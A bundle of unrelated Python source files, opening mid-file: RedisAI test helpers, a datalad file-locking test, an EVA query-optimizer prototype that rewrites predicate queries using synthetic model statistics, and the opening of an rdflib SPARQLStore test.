TEST_TFLITE = os.environ.get("TEST_TFLITE") != "0" and os.environ.get("WITH_TFLITE") != "0"
TEST_PT = os.environ.get("TEST_PT") != "0" and os.environ.get("WITH_PT") != "0"
TEST_ONNX = os.environ.get("TEST_ONNX") != "0" and os.environ.get("WITH_ORT") != "0"
COV = os.environ.get("COV") != "0" and os.environ.get("COV") != "0"
DEVICE = os.environ.get('DEVICE', 'CPU').upper().encode('utf-8', 'ignore').decode('utf-8')
VALGRIND = os.environ.get("VALGRIND") == "1"
print("Running tests on {}\n".format(DEVICE))
print("Using a max of {} iterations per test\n".format(MAX_ITERATIONS))
# change this to make inference tests longer
MAX_TRANSACTIONS = 100
# returns the test name and line number from which a helper function within this file was called.
# For example, if an assertion fails in check_error_message function, and the caller function to check_error_message
# is in tests_onnx.py line 25, this should return: "tests_onnx.py:25"
def get_caller_pos():
return f'{sys._getframe(2).f_code.co_filename.split("/")[-1]}:{sys._getframe(2).f_lineno}'
def ensureSlaveSynced(con, env, timeout_ms=0):
if env.useSlaves:
# When WAIT returns, all the previous write commands
# sent in the context of the current connection are
# guaranteed to be received by the number of replicas returned by WAIT.
wait_reply = con.execute_command('WAIT', '1', timeout_ms)
try:
number_replicas = int(wait_reply)
except Exception as ex:
# Error in converting to int
env.debugPrint(str(ex), force=True)
env.assertFalse(True, message=get_caller_pos())
return
env.assertEqual(number_replicas, 1)
# Ensures the command is sent and then forces a disconnect
# without waiting for the reply to be parsed.
# Useful for checking the behaviour of commands
# that are run with background threads
def send_and_disconnect(cmd, red):
pool = red.connection_pool
con = pool.get_connection(cmd[0])
ret = con.send_command(*cmd)
con.disconnect()
# For making sure that Redis will have the time to exit cleanly.
time.sleep(1)
return ret
def check_cuda():
return os.system('which nvcc')
def info_to_dict(info):
info = [el.decode('utf-8') if type(el) is bytes else el for el in info]
return dict(zip(info[::2], info[1::2]))
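# Illustrative only: info_to_dict turns Redis' flat [key, value, key, value,
# ...] reply layout into a dict, decoding any bytes along the way. The values
# below are placeholders, not real module output.
def _info_to_dict_example():
    flat_reply = [b'ai_TensorFlow_version', b'0.0.0', b'device', b'CPU']
    return info_to_dict(flat_reply)  # {'ai_TensorFlow_version': '0.0.0', 'device': 'CPU'}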
def load_resnet_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data/imagenet')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'dog.jpg')
model_filename = os.path.join(test_data_path, 'resnet50.pb')
script_filename = os.path.join(test_data_path, 'data_processing_script.txt')
with open(script_filename, 'rb') as f:
script = f.read()
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.uint8)
return model_pb, script, labels, img
def load_resnet_test_data_old():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data/imagenet')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'dog.jpg')
model_filename = os.path.join(test_data_path, 'resnet50.pb')
script_filename = os.path.join(test_data_path, 'data_processing_script_old.txt')
with open(script_filename, 'rb') as f:
script = f.read()
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.uint8)
return model_pb, script, labels, img
def load_mobilenet_v1_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'panda.jpg')
model_filename = os.path.join(test_data_path, 'mobilenet/mobilenet_v1_100_224_cpu_NxHxWxC.pb')
input_var = 'input'
output_var = 'MobilenetV1/Predictions/Reshape_1'
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.float32)
return model_pb, input_var, output_var, labels, img
def load_mobilenet_v2_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'panda.jpg')
model_filename = os.path.join(test_data_path, 'mobilenet/mobilenet_v2_1.4_224_frozen.pb')
input_var = 'input'
output_var = 'MobilenetV2/Predictions/Reshape_1'
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.float32)
return model_pb, input_var, output_var, labels, img
def load_creditcardfraud_data(env,max_tensors=10000):
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
model_filename = os.path.join(test_data_path, 'creditcardfraud.pb')
creditcard_transaction_filename = os.path.join(test_data_path, 'creditcard_10K.csv')
rg = default_rng()
creditcard_transactions = np.genfromtxt(creditcard_transaction_filename, delimiter=',', dtype='float32', skip_header=1, usecols=range(0,30))
creditcard_referencedata = []
for tr in range(0,max_tensors):
creditcard_referencedata.append(rg.random((1,256), dtype='float32'))
with open(model_filename, 'rb') as f:
model_pb = f.read()
return model_pb, creditcard_transactions, creditcard_referencedata
def run_mobilenet(con, img, input_var, output_var):
time.sleep(0.5 * random.randint(0, 10))
con.execute_command('AI.TENSORSET', 'input{1}',
'FLOAT', 1, img.shape[1], img.shape[0], img.shape[2],
'BLOB', img.tobytes())
con.execute_command('AI.MODELEXECUTE', 'mobilenet{1}',
'INPUTS', 1, 'input{1}', 'OUTPUTS', 1, 'output{1}')
def run_test_multiproc(env, routing_hint, n_procs, fn, args=tuple()):
procs = []
def tmpfn():
con = env.getConnectionByKey(routing_hint, None)
fn(con, *args)
return 1
for _ in range(n_procs):
p = Process(target=tmpfn)
p.start()
procs.append(p)
[p.join() for p in procs]
# Load a model/script from a file located in test_data dir.
def load_file_content(file_name):
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
filename = os.path.join(test_data_path, file_name)
with open(filename, 'rb') as f:
return f.read()
def check_error_message(env, con, error_msg, *command, error_msg_is_substr=False):
try:
con.execute_command(*command)
env.assertFalse(True, message=get_caller_pos())
except Exception as exception:
env.assertEqual(type(exception), redis.exceptions.ResponseError, message=get_caller_pos())
if error_msg_is_substr:
# We only verify that the given error_msg is a substring of the entire error message.
env.assertTrue(str(exception).find(error_msg) >= 0, message=get_caller_pos())
else:
env.assertEqual(error_msg, str(exception), message=get_caller_pos())
def check_error(env, con, *command):
try:
con.execute_command(*command)
env.assertFalse(True, message=get_caller_pos())
except Exception as e:
exception = e
env.assertEqual(type(exception), redis.exceptions.ResponseError, message=get_caller_pos())
# Returns a dict with all the fields of a certain section from INFO MODULES command
def get_info_section(con, section):
sections = ['ai_versions', 'ai_git', 'ai_load_time_configs', 'ai_backends_info', 'ai_cpu']
    section_ind = sections.index('ai_' + section)
return {k.split(":")[0]: k.split(":")[1]
for k in con.execute_command("INFO MODULES").decode().split("#")[section_ind+2].split()[1:]}
def get_connection(env, routing_hint):
return env.getConnectionByKey(routing_hint, None)
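# Hedged usage sketch, not part of the original helpers: how the utilities
# above are typically combined inside a test body. `env` is assumed to be the
# RLTest environment object used throughout this suite; the tensor key and the
# expected error text below are hypothetical.
def _example_helper_usage(env):  # pragma: no cover
    con = get_connection(env, '{1}')
    # Expect the command to fail with an error that merely *contains* the text.
    check_error_message(env, con, 'tensor key is empty',
                        'AI.TENSORGET', 'no_such_tensor{1}', 'BLOB',
                        error_msg_is_substr=True)
    # Read one section of INFO MODULES as a plain dict.
    versions = get_info_section(con, 'versions')
    env.assertTrue(len(versions) > 0)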
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 noet:
"""
LICENSE: MIT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os.path as op
from ..locking import lock_if_check_fails
from datalad.tests.utils import (
ok_exists,
with_tempfile,
ok_,
eq_,
known_failure_windows,
)
class Subproc:
# By implementing this closure as a class instead of as a nested function,
# it becomes possible to pickle it.
def __init__(self, tempfile):
self.tempfile = tempfile
def __call__(self, q):
with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\
as (_, lock2, acquired):
# we used to check for .acquired here but it was removed from
# fasteners API: https://github.com/harlowja/fasteners/issues/71
q.put(acquired)
@known_failure_windows
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
    # when the check fails we do acquire the lock, so the filename matters here
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
    # the same, but providing an operation name used in the lock file suffix
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=Subproc(tempfile), args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):
eq_(check, False)
ok_(lock)
ok_(acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=Subproc(tempfile), args=(q,))
p.start()
ok_(q.get())
p.join()
|
query_optimizer.py
|
"""
This file composes the functions that are needed to perform query optimization.
Currently, given a query, it does logical changes to forms that are
sufficient conditions.
Using statistics from Filters module, it outputs the optimal plan (converted
query with models needed to be used).
To see the query optimizer performance in action, simply run
python query_optimizer/query_optimizer.py
@Jaeho Bang
"""
import os
import socket
# The query optimizer decide how to label the data points
# Load the series of queries from a txt file?
import sys
import threading
from itertools import product
import numpy as np
from src import constants
eva_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(eva_dir)
class Query:
def __init__(self, obj, score, model, red_rate):
self.obj = obj
self.score = score
self.model = model
self.red_rate = red_rate
def __lt__(self, other):
return self.score < other.score
class QueryOptimizer:
"""
TODO: If you have a classifier for =, you can make a classifier for !=
TODO: Deal with parenthesis
"""
def __init__(self, ip_str="127.0.0.1"):
self.ip_str = ip_str
# self.startSocket()
self.operators = ["!=", ">=", "<=", "=", "<", ">"]
self.separators = ["||", "&&"]
def startSocket(self):
thread = threading.Thread(target=self.inputQueriesFromSocket)
thread.daemon = True
thread.start()
while True:
            user_query = input(
                'Type in your query in the form of __label__ > __number__\n')
            self.parseInput(user_query)
def parseInput(self, input):
"""
TODO: Need to provide query formats that can be used
:param input: string to be parsed
:return: something that the Load() class can understand
"""
pass
def inputQueriesFromTxt(self, input_path):
"""
TODO: Read the file line by line, use self.parseInput to give back
commands
:param input_path: full directory + file name
:return: method of training the pps
"""
pass
def inputQueriesFromSocket(self):
sock = socket.socket()
        sock.bind((self.ip_str, 123))
sock.listen(3)
print("Waiting on connection")
conn = sock.accept()
print("Client connected")
while True:
m = conn[0].recv(4096)
conn[0].send(m[::-1])
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def _findParenthesis(self, query):
start = []
end = []
query_copy = query
index = query_copy.find("(")
while index != -1:
start.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find("(")
query_copy = query
index = query_copy.find(")")
while index != -1:
end.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find(")")
return [start, end]
def _parseQuery(self, query):
"""
Each sub query will be a list
There will be a separator in between
:param query:
:return:
"""
query_parsed = []
query_subs = query.split(" ")
query_operators = []
for query_sub in query_subs:
if query_sub == "||" or query_sub == "&&":
query_operators.append(query_sub)
else:
if True not in [operator in self.operators for operator in
query_sub]:
return [], []
for operator in self.operators:
query_sub_list = query_sub.split(operator)
if type(query_sub_list) is list and len(
query_sub_list) > 1:
query_parsed.append(
[query_sub_list[0], operator, query_sub_list[1]])
break
# query_parsed ex: [ ["t", "=", "van"], ["s", ">", "60"]]
# query_operators ex: ["||", "||", "&&"]
return query_parsed, query_operators
def _logic_reverse(self, str):
if str == "=":
return "!="
elif str == "!=":
return "="
elif str == ">":
return "<="
elif str == ">=":
return "<"
elif str == "<":
return ">="
elif str == "<=":
return ">"
def convertL2S(self, parsed_query, query_ops):
final_str = ""
index = 0
for sub_parsed_query in parsed_query:
if len(parsed_query) >= 2 and index < len(query_ops):
final_str += ''.join(sub_parsed_query) + " " + query_ops[
index] + " "
index += 1
else:
final_str += ''.join(sub_parsed_query)
return final_str
def _wrangler(self, query, label_desc):
"""
import itertools
iterables = [ [1,2,3,4], [88,99], ['a','b'] ]
for t in itertools.product(*iterables):
print t
Different types of checks are performed
1. not equals check (f(C) != v)
2. comparison check (f(C) > v -> f(C) > t, for all t <= v)
3. Range check (v1 <= f(C) <= v2) - special type of comparison check
4. No-predicates = when column in finite and discrete, it can still
benefit
ex) 1 <=> type = car U type = truck U type = SUV
:return: transformed query
"""
# TODO: Need to implement range check
query_parsed, query_operators = self._parseQuery(query)
# query_sorted = sorted(query_parsed)
query_transformed = []
equivalences = []
equivalences_op = []
for query_sub_list in query_parsed:
subject = query_sub_list[0]
operator = query_sub_list[1]
object = query_sub_list[2]
assert (
subject in label_desc) # Label should be in label
# description dictionary
l_desc = label_desc[subject]
if l_desc[0] == constants.DISCRETE:
equivalence = [self.convertL2S([query_sub_list], [])]
assert (operator == "=" or operator == "!=")
alternate_string = ""
for category in l_desc[1]:
if category != object:
alternate_string += subject + self._logic_reverse(
operator) + category + " && "
                alternate_string = alternate_string[
                    :-len(" && ")]  # strip the trailing ' && '
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
elif l_desc[0] == constants.CONTINUOUS:
equivalence = [self.convertL2S([query_sub_list], [])]
assert (operator == "=" or operator == "!=" or operator == "<"
or operator == "<=" or operator == ">" or operator ==
">=")
alternate_string = ""
if operator == "!=":
alternate_string += subject + ">" + object + " && " + \
subject + "<" + object
query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(query_tmp)
if operator == "<" or operator == "<=":
object_num = eval(object)
for number in l_desc[1]:
if number > object_num:
alternate_string = subject + operator + str(number)
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
if operator == ">" or operator == ">=":
object_num = eval(object)
for number in l_desc[1]:
if number < object_num:
alternate_string = subject + operator + str(number)
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
equivalences.append(equivalence)
possible_queries = product(*equivalences)
for q in possible_queries:
query_transformed.append(q)
return query_transformed, query_operators
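    # Illustrative example (not from the original source): with label_desc
    # {"t": [constants.DISCRETE, ["sedan", "suv", "truck", "van"]]}, the single
    # sub-query "t=van" produces the equivalence ["t=van",
    # "t!=sedan && t!=suv && t!=truck"], so _wrangler returns the candidate
    # forms [("t=van",), ("t!=sedan && t!=suv && t!=truck",)] and an empty
    # operator list.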
def _compute_expression(self, query_info, pp_list, pp_stats, k,
accuracy_budget):
"""
def QueryOptimizer(P, {trained PPs}):
P = wrangler(P)
{E} = compute_expressions(P,{trained PP},k) #k is a fixed
constant which limits number of individual PPs
in the final expression
for E in {E}:
Explore_PP_accuracy_budget(E) # Paper says dynamic program
Explore_PP_Orderings(E) #if k is small, any number of orders
can be explored
Compute_cost_vs_red_rate(E) #arithmetic over individual c,
a and r[a] numbers
return E_with_max_c/r
1. p^(P/p) -> PPp
2. PPp^q -> PPp ^ PPq
3. PPpvq -> PPp v PPq
4. p^(P/p) -> ~PP~q
-> we don't need to apply these rules, we simply need to see for each
sub query which PP gives us the best rate
:param query_info: [possible query forms for a given query, operators
that go in between]
:param pp_list: list of pp names that are currently available
:param pp_stats: list of pp models associated with each pp name with
R,C,A values saved
:param k: number of pps we can use at maximum
:return: the list of pps to use that maximizes reduction rate (ATM)
"""
evaluations = []
evaluation_models = []
evaluations_stats = []
query_transformed, query_operators = query_info
# query_transformed = [[["t", "!=", "car"], ["t", "=", "van"]], ... ]
for possible_query in query_transformed:
evaluation = []
evaluation_stats = []
k_count = 0
op_index = 0
for query_sub in possible_query: # Even inside query_sub it can
# be divided into query_sub_sub
if k_count > k: # TODO: If you exceed a certain number,
# you just ignore the expression
evaluation = []
evaluation_stats = []
continue
query_sub_list, query_sub_operators = self._parseQuery(
query_sub)
evaluation_tmp = []
evaluation_models_tmp = []
evaluation_stats_tmp = []
for i in range(len(query_sub_list)):
query_sub_str = ''.join(query_sub_list[i])
if query_sub_str in pp_list:
# Find the best model for the pp
data = self._find_model(query_sub_str, pp_stats,
accuracy_budget)
if data is None:
continue
else:
model, reduction_rate = data
evaluation_tmp.append(query_sub_str)
evaluation_models_tmp.append(
model) # TODO: We need to make sure this is
# the model_name
evaluation_stats_tmp.append(reduction_rate)
k_count += 1
reduc_rate = 0
if len(evaluation_stats_tmp) != 0:
reduc_rate = self._update_stats(evaluation_stats_tmp,
query_sub_operators)
evaluation.append(query_sub)
evaluation_models.append(evaluation_models_tmp)
evaluation_stats.append(reduc_rate)
op_index += 1
evaluations.append(Query(self.convertL2S(evaluation, query_operators), self._update_stats(evaluation_stats, query_operators), evaluation_models_tmp, reduc_rate))
# evaluations_stats.append(
# self._update_stats(evaluation_stats, query_operators))
evaluations.sort()
# max_index = np.argmax(np.array(evaluations_stats), axis=0)
max_index = 0
best_query = evaluations[
max_index].obj # this will be something like "t!=bus && t!=truck &&
# t!=car"
best_models = evaluations[max_index].model
best_reduction_rate = evaluations[max_index].red_rate
pp_names, op_names = self._convertQuery2PPOps(best_query)
return [list(zip(pp_names, best_models)), op_names,
best_reduction_rate]
def _convertQuery2PPOps(self, query):
"""
:param query: str (t!=car && t!=truck)
:return:
"""
query_split = query.split(" ")
pp_names = []
op_names = []
for i in range(len(query_split)):
if i % 2 == 0:
pp_names.append(query_split[i])
else:
if query_split[i] == "&&":
op_names.append(np.logical_and)
else:
op_names.append(np.logical_or)
return pp_names, op_names
# Make this function take in the list of reduction rates and the operator
# lists
def _update_stats(self, evaluation_stats, query_operators):
if len(evaluation_stats) == 0:
return 0
final_red = evaluation_stats[0]
# assert (len(evaluation_stats) == len(query_operators) + 1)
for i in range(1, len(evaluation_stats)):
if query_operators[i - 1] == "&&":
final_red = final_red + evaluation_stats[i] - final_red * \
evaluation_stats[i]
elif query_operators[i - 1] == "||":
final_red = final_red * evaluation_stats[i]
return final_red
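    # Illustrative arithmetic (not from the original source): for reduction
    # rates [0.2, 0.5], the "&&" rule yields 0.2 + 0.5 - 0.2 * 0.5 = 0.6 and
    # the "||" rule yields 0.2 * 0.5 = 0.1.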
def _compute_cost_red_rate(self, C, R):
assert (
R >= 0 and R <= 1) # R is reduction rate and should be
# between 0 and 1
if R == 0:
R = 0.000001
return float(C) / R
def _find_model(self, pp_name, pp_stats, accuracy_budget):
possible_models = pp_stats[pp_name]
best = [] # [best_model_name, best_model_cost /
# best_model_reduction_rate]
for possible_model in possible_models:
if possible_models[possible_model]["A"] < accuracy_budget:
continue
if best == []:
best = [possible_model, self._compute_cost_red_rate(
possible_models[possible_model]["C"],
possible_models[possible_model]["R"]),
possible_models[possible_model]["R"]]
else:
alternative_best_cost = self._compute_cost_red_rate(
possible_models[possible_model]["C"],
possible_models[possible_model]["R"])
if alternative_best_cost < best[1]:
best = [possible_model, alternative_best_cost,
possible_models[possible_model]["R"]]
if best == []:
return None
else:
return best[0], best[2]
def run(self, query, pp_list, pp_stats, label_desc, k=3,
accuracy_budget=0.9):
"""
:param query: query of interest ex) TRAF-20
:param pp_list: list of pp_descriptions - queries that are available
:param pp_stats: this will be dictionary where keys are "pca/ddn",
it will have statistics saved which are R (
reduction_rate), C (cost_to_train), A (accuracy)
:param k: number of different PPs that are in any expression E
:return: selected PPs to use for reduction
"""
query_transformed, query_operators = self._wrangler(query, label_desc)
# query_transformed is a comprehensive list of transformed queries
return self._compute_expression([query_transformed, query_operators],
pp_list, pp_stats, k, accuracy_budget)
if __name__ == "__main__":
query_list = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
"t=van && s>60 && s<65", "c!=white && (t=sedan || t=truck)",
"i=pt335 && o!=pt211 && o!=pt208",
"t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211",
"t!=suv && t!=van && c!=red && t!=white",
"(i=pt335 || i=pt342) && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
# TODO: Support for parenthesis queries
query_list_mod = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck",
"i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
"t=van && s>60 && s<65",
"t=sedan || t=truck && c!=white",
"i=pt335 && o!=pt211 && o!=pt208",
"t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211",
"t!=suv && t!=van && c!=red && t!=white",
"i=pt335 || i=pt342 && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
query_list_test = ["c=white && t!=suv && t!=van"]
synthetic_pp_list = ["t=suv", "t=van", "t=sedan", "t=truck",
"c=red", "c=white", "c=black", "c=silver",
"s>40", "s>50", "s>60", "s<65", "s<70",
"i=pt335", "i=pt211", "i=pt342", "i=pt208",
"o=pt335", "o=pt211", "o=pt342", "o=pt208"]
query_list_short = ["t=van && s>60 && o=pt211"]
synthetic_pp_list_short = ["t=van", "s>60", "o=pt211"]
# TODO: Might need to change this to a R vs A curve instead of static
# numbers
# TODO: When selecting appropriate PPs, we only select based on reduction
# rate
synthetic_pp_stats_short = {
"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
"s>60": {"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"o=pt211": {"none/dnn": {"R": 0.13, "C": 0.32, "A": 0.99},
"none/kde": {"R": 0.14, "C": 0.12, "A": 0.93}}}
synthetic_pp_stats = {"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15,
"A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05,
"A": 0.95}},
"t=suv": {
"none/svm": {"R": 0.13, "C": 0.01, "A": 0.95}},
"t=sedan": {
"none/svm": {"R": 0.21, "C": 0.01, "A": 0.94}},
"t=truck": {
"none/svm": {"R": 0.05, "C": 0.01, "A": 0.99}},
"c=red": {
"none/svm": {"R": 0.131, "C": 0.011,
"A": 0.951}},
"c=white": {
"none/svm": {"R": 0.212, "C": 0.012,
"A": 0.942}},
"c=black": {
"none/svm": {"R": 0.133, "C": 0.013,
"A": 0.953}},
"c=silver": {
"none/svm": {"R": 0.214, "C": 0.014,
"A": 0.944}},
"s>40": {
"none/svm": {"R": 0.08, "C": 0.20, "A": 0.8}},
"s>50": {
"none/svm": {"R": 0.10, "C": 0.20, "A": 0.82}},
"s>60": {
"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"s<65": {
"none/svm": {"R": 0.05, "C": 0.20, "A": 0.8}},
"s<70": {
"none/svm": {"R": 0.02, "C": 0.20, "A": 0.9}},
"o=pt211": {
"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123,
"A": 0.932}},
"o=pt335": {
"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124,
"A": 0.934}},
"o=pt342": {
"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125,
"A": 0.935}},
"o=pt208": {
"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126,
"A": 0.936}},
"i=pt211": {
"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123,
"A": 0.932}},
"i=pt335": {
"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124,
"A": 0.934}},
"i=pt342": {
"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125,
"A": 0.935}},
"i=pt208": {
"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126,
"A": 0.936}}}
# TODO: We will need to convert the queries/labels into "car, bus, van,
# others". This is how the dataset defines things
label_desc = {"t": [constants.DISCRETE, ["sedan", "suv", "truck", "van"]],
"s": [constants.CONTINUOUS, [40, 50, 60, 65, 70]],
"c": [constants.DISCRETE,
["white", "red", "black", "silver"]],
"i": [constants.DISCRETE,
["pt335", "pt342", "pt211", "pt208"]],
"o": [constants.DISCRETE,
["pt335", "pt342", "pt211", "pt208"]]}
qo = QueryOptimizer()
print("Running Query Optimizer Demo...")
for query in query_list_mod:
# print(query, " -> ", (
# qo.run(query, synthetic_pp_list, synthetic_pp_stats, label_desc)))
print(qo.run(query, synthetic_pp_list_short,
synthetic_pp_stats_short, label_desc))
|
test_sparqlstore.py
|
from rdflib import Graph, URIRef, Literal
from urllib.request import urlopen
from urllib.error import HTTPError
import unittest
from nose import SkipTest
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
from . import helper
try:
assert len(urlopen("http://dbpedia.org/sparql").read()) > 0
except Exception:
raise SkipTest("No HTTP connection.")
class SPARQLStoreDBPediaTestCase(unittest.TestCase):
store_name = "SPARQLStore"
path = "http://dbpedia.org/sparql"
storetest = True
create = False
def setUp(self):
self.graph = Graph(store="SPARQLStore")
self.graph.open(self.path, create=self.create)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "select distinct ?Concept where {[] a ?Concept} LIMIT 1"
res = helper.query_with_retry(self.graph, query, initNs={})
for i in res:
assert type(i[0]) == URIRef, i[0].n3()
def test_initNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph,
query, initNs={"xyzzy": "http://www.w3.org/2004/02/skos/core#"}
)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_noinitNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
self.assertRaises(ValueError, self.graph.query, query)
def test_query_with_added_prolog(self):
prologue = """\
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_counting_graph_and_store_queries(self):
query = """
SELECT ?s
WHERE {
?s ?p ?o .
}
LIMIT 5
"""
g = Graph("SPARQLStore")
g.open(self.path)
count = 0
result = helper.query_with_retry(g, query)
for _ in result:
count += 1
assert count == 5, "Graph(\"SPARQLStore\") didn't return 5 records"
from rdflib.plugins.stores.sparqlstore import SPARQLStore
st = SPARQLStore(query_endpoint=self.path)
count = 0
result = helper.query_with_retry(st, query)
for _ in result:
count += 1
assert count == 5, "SPARQLStore() didn't return 5 records"
class SPARQLStoreUpdateTestCase(unittest.TestCase):
def setUp(self):
port = self.setup_mocked_endpoint()
self.graph = Graph(store="SPARQLUpdateStore", identifier=URIRef("urn:ex"))
self.graph.open(
(
"http://localhost:{port}/query".format(port=port),
"http://localhost:{port}/update".format(port=port),
),
create=False,
)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def setup_mocked_endpoint(self):
# Configure mock server.
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
